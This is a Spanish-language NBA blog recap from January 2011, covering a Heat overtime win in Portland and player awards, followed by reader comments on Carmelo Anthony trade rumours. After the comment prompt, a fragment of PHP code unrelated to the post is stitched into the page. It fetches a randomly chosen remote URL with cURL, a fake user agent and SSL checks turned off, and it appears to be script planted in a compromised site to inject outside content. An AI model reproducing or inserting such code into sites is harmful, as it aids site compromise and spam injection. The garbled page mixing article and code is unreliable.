La crónica (09/01/2011)

10 de January de 2011 por TheDeerHunter

Decimotercera victoria foránea seguida de los Miami Heat que tuvieron que sudar a base de bien en el Rose Garden. Los Blazers llegaron a tener contra las cuerdas a los líderes de la Southeast con una gran actuación de Aldridge y de Batum, pero la genialidad de LeBron y Wade salió a relucir cuando más difícil estaba el choque, lograron forzar la prórroga cuando pocos daban un duro por ello y resolver cómodamente en la misma. Cada día es más difícil doblegarles.

Los Spurs, sin embargo, lograron mantener distancias a pesar de las dificultades que les planteó Minnesotta. Los Wolves volvieron a morir en la orilla, esta vez por un tímido partido de Beasley. Los Spurs basaron su victoria en Manudo y en otro gran partido de su banquillo.

Los Knicks plantaron demasiado poca batalla a los Lakers en el Staples. Los campeones firmaron un choque tremendamente serio, tanto que Bynum terminó expulsado de una forma un tanto extraña. Los Hornets secaron a los Nuggets con un Melo fuera de sitio.

Los Suns ganaron sobrados a unos Cavs donde sólo les faltaba la lesión definitiva de Varejao para el resto de la temporada. Ahora mismo son los más claros candidatos a la cuchara de madera. Por delante de Toronto, que le ganó a Sacramento y, cómo no, por delante de los Clippers, sin problemas para doblegar a los Warriors.

MVP: LeBron James 44 puntos, 13 rebotes, 6 asistencias y 2 robos muy por encima de Dwyane Wade con 34-8-5. Lanzado hacia su 3er MVP consecutivo.

El rookie: 23-12 y victoria para Blake Griffin. 18-10 para Cousins pero derrotado en Toronto.

La sorpresa: Partido más que correcto de Robin Lopez. 15-6 rebotes que deberían ser lo mínimo exigible en su caso. Vergüenza debería darle que le quite el puesto Childress como pívot.

La decepción: Los 8 puntos de Melo son un claro síntoma de que no se encuentra ahora mismo entre nosotros. Quizás deberían darle unas vacaciones.

El mayor esfuerzo en vano: LaMarcus Aldridge dejándose la piel sin lograr siempre recompensa. Ayer rozó el triple doble con 31-14-7

Comenta

13 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Se puede debatir mucho sobre estos Heat,a algunos les encantará ver a estos 2 extraterrestres ganar partido tras partido con actuaciones sobrehumanas y otros más románticos de la canasta verán un juego carente de lo que realmente es el baloncesto,un juego de equipo.
    A mi modo de ver,Miami cuenta con 2 de los mayores talentos que ha dado este deporte en toda su historia,si encima le sumas a un jugador más que correcto como Bosh,el resto del equipo se convierte en simples comparsas,jugadores de intendencia,es la apuesta de Miami,para lo bueno y para lo malo.
    Esta fórmula les servirá para playoffs???…yo creo que no,eso si,disfruto con el talento y con clinics de driblings,mates y recursos de este par d monstruos,hoy muchos aficionados en el Rose Garden se han ido cachondísimos a sus casas.
    Como apunte: Aldridge se ha comido con papas a Bosh.

    Despierta la fiebre amarilla con MalascartasArtest a la cabeza jojojo

    5 de 23 entre Melo y Billups.  ???????

      Citar

  2. Sancho88 dice:
    #2

    Estarían demasiado ansiados con los millones y los nuevos contratos del Ponkrhasov, jeje.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sí que fue un partido serio de los Lakers, aunque durante los primeros minutos las sensaciones fueron malísimas. Muy bien Bynum, pese a la expulsión (que vaya falta le pitan…) y muy bien Shannon, que va a ser esencial durante la baja de Barnes.

    Quiero destacar a Baron Davis, que ha vuelto de entre los muertos, jeje. Parece que se ha dado cuenta de lo que necesitan los Clippers, y lleva varios partidos dando exactamente eso. Es muy divertido ver a LAC, por supuesto con Griffin a la cabeza pero también con DeAndre Jordan, Gordon y B-Diddy.

      Citar

  4. Denise dice:
    #4

    Si fuese el coach, a Baron Davis le daría una minutada, para que haga buenos números y engorde sus estadísticas, y así facilitar un traspaso por jugadores jóvenes o rondas de draft y quitarse de en medio los 35 kilos que le quedan por cobrar. A Foye también le daría muchos minutos para que alguien se fije en este jugador y los Clippers pudieran quitarselo de encima. Y si pierden partidos, no pasa nada, mejor de cara al Draft del año que viene. Lo importante ahora es jugar atractivo y dando espectáculo para llamar la atención de los espectadores, y dar confianza a sus rookies.
    El año que vienen podrían tener un equipazo, con Griffin, Gordon, Kaman, Aminu, Bledsoe, DeAndré+1era ronda de draft del año que viene + lo que pudiesen pillar por Baron Davis. Buena base para por fin construir un equipo ganador en esta franquicia perdedora.

      Citar

  5. CAMPO2 dice:
    #5

    Antes me quito a Kaman que lleva dos vidas lesionado que a B. Davis, yo creo que aun pueden llegar a play offs.

    Por lo que parece es inminente el traspaso de Melo, o otra vez siguen mareando la perdiz como toda la temporada.

    Creis que lo traspasaran o acabara el contrato con Denver? lo que es seguro que Denver quiere el traspaso.

      Citar

  6. wolf15 dice:
    #6

      Citar

  7. KB # 24 dice:
    #7

    Si los Nets consiguieran a Melo, sería entonces Gasol titular como forward en el oeste??

    Como dice CAMPO2, creo que se quedará en rumor y Melo acabará contrato y se pirará el año que viene con STAT

      Citar

  8. Denise dice:
    #8

    El rumor que cobra mas fuerza involucra a Detroit-Denver-Nets, y sería un mega traspaso en caso de concretarse.
    Los Nets se harían con Melo, Billups, Richard Hamilton y Shelden Williams.
    Los Nuggets conseguirían a Favors, Harris, Graham, Ross, Morrow y dos primeras rondas de draft.
    Los Pistons conseguirían a Petro y el expiring de Troy Murphy.

    Por lo que las estrategias serían,
    Nets: luchar por el anillo
    Nuggets: Reconstrucción
    Pistons: Liberar el máximo salario posible

      Citar

  9. CAMPO2 dice:
    #9

    De marca me fio muy poco

      Citar

  10. Vader dice:
    #10

    Tiene pinta de que va en serio esta vez… ojala no fuera así porque me gustaria que jugara en los Knicks con Stat.

    Creo que el gran handicap de los Knicks en todo este asunto es la amenaza de lockout y como pueden quedar los salarios una vez se llegue a un acuerdo. En estas condiciones es normal que el jugador este dispuesto a firmar la extensión de contrato para ir a los Nets. Parece que la primera opción de Melo era sinceramente los Knicks, pero estos “sólo” pueden ofrecer jugadores y el expiring de Curry porque no tienen rondas del draft (gracias Isiah y gracias plan 2010). En cambio los Nets tienen a Favors, expiring y muchas rondas…

    En fin, hubiera sido un sueño juntar a Stat y Melo en el Madison pero parece que no podra ser.

    El backourt de los Nets sera de aupa con Billups, Hamilton y Melo. Y luego Brook Lopez por dentro, un equipo muy bueno sin duda.

    Saludos

      Citar

  11. Carlos dice:
    #11

    BIllups, Hamilton, Melo y Brook Lopez… no me parece que vayan a hacer nada de nada, la verdad. Billups y hamilton estan ya de vuelta, y sería un equipo inferior a celtics, lakers, san antonio, heat, magic, bulls o incluso knicks o hawks. Deportivamente hablando Melo no consigue un equipo claramente mejor que el que tenía en denver…

      Citar

  12. CAMPO2 dice:
    #12

    pues yo encantado de que venga a los Nets y que billups este un par de años y entonces traigan a cris paul

      Citar

  13. Vader dice:
    #13

    Claro el tema es que juntas a Melo y Lopez y dentro de un par de años cuando acaba contrato C.Paul liberas los contratos de Billups y Hamilton. Deportivamente para Melo seria más interesante ir a Chicago o New York pero sus ofertas no gustan tanto a Denver y con la amenaza de lockout no parece probable que se espere hasta el verano para firmar. 65 millones de dólares es mucho dinero…

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>